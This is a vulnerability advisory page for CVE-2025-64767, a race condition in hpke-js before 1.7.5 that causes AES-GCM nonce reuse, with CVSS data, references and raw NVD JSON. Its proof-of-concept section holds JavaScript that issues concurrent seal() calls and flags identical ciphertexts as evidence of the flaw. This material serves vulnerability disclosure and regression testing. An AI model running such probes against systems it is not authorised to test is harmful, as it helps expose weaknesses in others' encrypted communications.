Security Vulnerability Report
CVE-2025-64767 CVSS 9.1 CRITICAL

CVE-2025-64767

Published: 2025-11-21 19:16:03
Last Modified: 2026-04-15 00:35:42

Description

hpke-js is a Hybrid Public Key Encryption (HPKE) module built on top of Web Cryptography API. Prior to version 1.7.5, the public SenderContext Seal() API has a race condition which allows for the same AEAD nonce to be re-used for multiple Seal() calls. This can lead to complete loss of Confidentiality and Integrity of the produced messages. This issue has been patched in version 1.7.5.

CVSS Details

CVSS Score
9.1
Severity
CRITICAL
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N

Configurations (Affected Products)

No configuration data available.

hpke-js < 1.7.5

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
javascript
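// CVE-2025-64767 - nonce reuse in hpke-js SenderContext.seal() (race condition).
// Regression check: issue concurrent seal() calls on ONE sender context and
// report whether any two of them produced byte-identical ciphertext.
//
// Why this detects the bug: under AES-128-GCM the ciphertext (including the
// tag) is a deterministic function of (key, nonce, aad, plaintext). With a
// fixed plaintext and no aad, two identical outputs from the same context can
// only come from the same nonce. A fixed build (>= 1.7.5) must never report a
// duplicate; an affected build may, but the race is timing dependent, so a
// single clean run is not proof of absence.
//
// Fixes relative to the original PoC on this page: generateKeyPair() was an
// undefined free function (the suite provides it); seal() resolves to a single
// ArrayBuffer, not a [ciphertext, sealer] pair; comparing two ciphertexts of
// DIFFERENT plaintexts for equality cannot reveal nonce reuse; and `^` on
// Buffers is numeric, not byte-wise. The calls are now concurrent - sequential
// awaits never exercise a race inside seal().
const { CipherSuite, KemId, KdfId, AeadId } = require('hpke-js');

/**
 * Hex-encodes a ciphertext so outputs can be compared and used as Set keys.
 * @param {ArrayBuffer|Uint8Array} buf - raw ciphertext from seal()
 * @returns {string} lowercase hex
 */
function toHex(buf) {
  return Buffer.from(buf).toString('hex');
}

/**
 * Returns the 0-based indexes of entries that repeat an earlier entry.
 * @param {string[]} hexes - hex-encoded ciphertexts in call order
 * @returns {number[]} indexes of repeated entries (empty when all distinct)
 */
function findDuplicates(hexes) {
  const seen = new Set();
  const dupes = [];
  hexes.forEach((hex, index) => {
    if (seen.has(hex)) {
      dupes.push(index);
    }
    seen.add(hex);
  });
  return dupes;
}

/**
 * Creates a sender context, runs `calls` concurrent seal() operations on it
 * with the same plaintext, and logs whether a nonce was reused.
 * @param {number} [calls=64] - number of concurrent seal() calls to issue
 * @returns {Promise<boolean>} true when at least two ciphertexts were identical
 * @throws rethrows any hpke-js error (unsupported suite, WebCrypto failure)
 */
async function exploitNonceReuse(calls = 64) {
  const suite = new CipherSuite({
    kem: KemId.DhkemX25519HkdfSha256,
    kdf: KdfId.HkdfSha256,
    aead: AeadId.Aes128Gcm,
  });
  // Any recipient key works: the check only looks at the sender's nonce handling.
  const recipient = await suite.generateKeyPair();
  const sender = await suite.createSenderContext({
    recipientPublicKey: recipient.publicKey,
  });

  const pt = new TextEncoder().encode('Message');
  // Start every seal() before awaiting any of them so they overlap in flight.
  const ciphertexts = await Promise.all(
    Array.from({ length: calls }, () => sender.seal(pt)),
  );
  const dupes = findDuplicates(ciphertexts.map(toHex));
  const reused = dupes.length > 0;

  console.log('Nonce reuse detected:', reused);
  if (reused) {
    console.log(
      `Identical ciphertexts at call indexes ${dupes.join(', ')} - upgrade hpke-js to >= 1.7.5`,
    );
  }
  return reused;
}

exploitNonceReuse().catch(console.error);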

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-64767", "sourceIdentifier": "[email protected]", "published": "2025-11-21T19:16:03.497", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "hpke-js is a Hybrid Public Key Encryption (HPKE) module built on top of Web Cryptography API. Prior to version 1.7.5, the public SenderContext Seal() API has a race condition which allows for the same AEAD nonce to be re-used for multiple Seal() calls. This can lead to complete loss of Confidentiality and Integrity of the produced messages. This issue has been patched in version 1.7.5."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N", "baseScore": 9.1, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 5.2}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-323"}]}], "references": [{"url": "https://github.com/dajiaji/hpke-js/blob/b7fd3592c7c08660c98289d67c6bb7f891af75c4/packages/core/src/senderContext.ts#L22-L34", "source": "[email protected]"}, {"url": "https://github.com/dajiaji/hpke-js/commit/94a767c9b9f37ce48d5cd86f7017d8cacd294aaf", "source": "[email protected]"}, {"url": "https://github.com/dajiaji/hpke-js/security/advisories/GHSA-73g8-5h73-26h4", "source": "[email protected]"}]}}